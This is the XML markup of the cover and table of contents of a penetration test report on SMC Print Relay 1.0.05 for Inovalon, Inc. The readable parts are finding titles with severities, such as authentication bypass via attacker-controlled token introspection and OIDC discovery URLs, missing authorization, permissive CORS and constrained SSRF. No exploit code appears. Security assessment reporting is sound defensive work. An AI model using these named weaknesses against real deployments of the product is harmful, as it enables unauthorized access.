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0CB1" w14:textId="77777777" w:rsidR="0065633A" w:rsidRPr="00217429" w:rsidRDefault="0065633A" w:rsidP="0065633A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="183DC1D6" w14:textId="77777777" w:rsidR="005E101C" w:rsidRPr="00217429" w:rsidRDefault="005E101C" w:rsidP="009B1C2A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3070"/>
        </w:tabs>
        <w:ind w:left="3070" w:hanging="3070"/>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1441F8ED" w14:textId="77777777" w:rsidR="00674257" w:rsidRPr="00217429" w:rsidRDefault="00674257" w:rsidP="009B1C2A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3070"/>
        </w:tabs>
        <w:ind w:left="3070" w:hanging="3070"/>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41F748D4" w14:textId="77777777" w:rsidR="009B1C2A" w:rsidRPr="00217429" w:rsidRDefault="009B1C2A" w:rsidP="0065633A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4200"/>
          <w:tab w:val="left" w:pos="5115"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46B1D7B7" w14:textId="77777777" w:rsidR="000C71CE" w:rsidRPr="00217429" w:rsidRDefault="009B1C2A" w:rsidP="009B1C2A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4200"/>
          <w:tab w:val="left" w:pos="5115"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47467DDC" wp14:editId="76574D31">
            <wp:extent cx="5943600" cy="739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943600" cy="739775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpY="6343"/>
        <w:tblW w:w="8808" w:type="dxa"/>
        <w:tblBorders>
          <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
        </w:tblBorders>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="330"/>
        <w:gridCol w:w="8478"/>
      </w:tblGrid>
      <w:tr w:rsidR="0065633A" w:rsidRPr="00217429" w14:paraId="05C54664" w14:textId="77777777" w:rsidTr="00674257">
        <w:trPr>
          <w:trHeight w:val="344"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="36" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2FAD5422" w14:textId="77777777" w:rsidR="0065633A" w:rsidRPr="00217429" w:rsidRDefault="0065633A" w:rsidP="00674257">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="4200"/>
                <w:tab w:val="left" w:pos="5115"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="96"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8478" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="27816F39" w14:textId="77777777" w:rsidR="000014CD" w:rsidRDefault="000014CD" w:rsidP="00EE48F3">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SMC Print Relay (1.0.05)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B94B380" w14:textId="77777777" w:rsidR="00A8072B" w:rsidRDefault="003D0ED0" w:rsidP="00EE48F3">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Penetration Test</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02B70E85" w14:textId="77777777" w:rsidR="003D0ED0" w:rsidRDefault="003D0ED0" w:rsidP="003D0ED0">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="4200"/>
                <w:tab w:val="left" w:pos="5115"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="56"/>
                <w:szCs w:val="56"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="56"/>
                <w:szCs w:val="56"/>
              </w:rPr>
              <w:t>Report</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43B4AFB3" w14:textId="77777777" w:rsidR="0065633A" w:rsidRPr="00217429" w:rsidRDefault="0065633A" w:rsidP="004E4170">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="4200"/>
                <w:tab w:val="left" w:pos="5115"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="56"/>
                <w:szCs w:val="56"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0065633A" w:rsidRPr="00217429" w14:paraId="2300043D" w14:textId="77777777" w:rsidTr="00674257">
        <w:trPr>
          <w:trHeight w:val="361"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="36" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7C2A2512" w14:textId="77777777" w:rsidR="0065633A" w:rsidRPr="00217429" w:rsidRDefault="0065633A" w:rsidP="00674257">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="4200"/>
                <w:tab w:val="left" w:pos="5115"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="52"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8478" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="77DD0CF6" w14:textId="77777777" w:rsidR="003D0ED0" w:rsidRDefault="0065633A" w:rsidP="003D0ED0">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="56"/>
                <w:szCs w:val="56"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="56"/>
                <w:szCs w:val="56"/>
              </w:rPr>
              <w:t>Inovalon, Inc.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76472915" w14:textId="77777777" w:rsidR="0065633A" w:rsidRPr="00217429" w:rsidRDefault="003D0ED0" w:rsidP="003D0ED0">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="56"/>
                <w:szCs w:val="56"/>
              </w:rPr>
              <w:t>V 1.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:t>06/10-14/26</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="52AF6A81" w14:textId="77777777" w:rsidR="00674257" w:rsidRPr="00217429" w:rsidRDefault="0065633A" w:rsidP="0065633A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
          <w:b/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
          <w:b/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E95C89B" w14:textId="77777777" w:rsidR="0065633A" w:rsidRPr="00217429" w:rsidRDefault="0065633A" w:rsidP="0065633A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc232079905"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Table Of Contents</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="433DB1CF" w14:textId="77777777" w:rsidR="0065633A" w:rsidRPr="00217429" w:rsidRDefault="0065633A" w:rsidP="0065633A">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:cs="Open Sans"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A18ED92" w14:textId="62613CD3" w:rsidR="00183493" w:rsidRDefault="009C1A99">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rStyle w:val="Hyperlink"/>
          <w:rFonts w:cs="Open Sans"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:cs="Open Sans"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:cs="Open Sans"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc232079905" w:history="1">
        <w:r w:rsidR="00183493" w:rsidRPr="00394A04">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Open Sans"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table Of Contents</w:t>
        </w:r>
        <w:r w:rsidR="00183493">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00183493">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00183493">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc232079905 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00183493">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00183493">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00183493">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r w:rsidR="00183493">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="195EBFE0" w14:textId="5F9BC8DE"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6" w:history="1">
        <w:r w:rsidRPr="00394A04">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>EXECUTIVE SUMMARY</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc232079906 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="62F3B2F0" w14:textId="20468FD5"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7" w:history="1">
        <w:r w:rsidRPr="00394A04">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Open Sans"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Engagement Scope</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc232079907 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3A2494BA" w14:textId="3D84E58E"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08" w:history="1">
        <w:r w:rsidRPr="00394A04">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>TIMELINE</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc232079908 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="286A80DC" w14:textId="4A2B8FCA" w:rsidR="00183493" w:rsidRDefault="0018349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32079909" w:history="1">
        <w:r w:rsidRPr="00394A04">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>TECHNICAL FINDINGS OVERVIEW</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc232079909 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="18DE30DF" w14:textId="78140FE0"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0" w:history="1">
        <w:r w:rsidRPr="00394A04">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>1. Authentication Bypass via Attacker-Controlled Token Introspection URL - High</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc232079910 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1F05904A" w14:textId="285BA21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1" w:history="1">
        <w:r w:rsidRPr="00394A04">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2. Authentication Bypass via Attacker-Controlled OpenID Connect Discovery (B2C Validation Path) - High</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc232079911 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>18</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="337D1FFB" w14:textId="722C936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2" w:history="1">
        <w:r w:rsidRPr="00394A04">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3. Missing Authorization on the PrintPdf Endpoint - High</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc232079912 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6240A364" w14:textId="48F1A312"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3" w:history="1">
        <w:r w:rsidRPr="00394A04">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>4. Overly Permissive CORS Policy Enabling Cross-Site Exploitation - High</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc232079913 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="64C930E8" w14:textId="06FDCD63"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4" w:history="1">
        <w:r w:rsidRPr="00394A04">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5. Unauthenticated Modification of the Print-Routing Map - Medium</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc232079914 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>31</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15661E9B" w14:textId="5C66AB76"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5" w:history="1">
        <w:r w:rsidRPr="00394A04">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6. Unauthenticated Information Disclosure via Printer Enumeration - Medium</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc232079915 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>34</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="09B0F07C" w14:textId="6D1687BB"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6" w:history="1">
        <w:r w:rsidRPr="00394A04">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>7. End-of-Life and Outdated Components Processing Untrusted Input - Medium</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc232079916 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>37</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="64068628" w14:textId="10130AA8"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7" w:history="1">
        <w:r w:rsidRPr="00394A04">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>8. Constrained Server-Side Request Forgery via X-ProviderValidationUrl - Low</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc232079917 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>41</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6955A6D0" w14:textId="3B325E7E"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8" w:history="1">
        <w:r w:rsidRPr="00394A04">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>9. Unsigned Application Binaries and Installer - Low</w:t>
        </w:r>
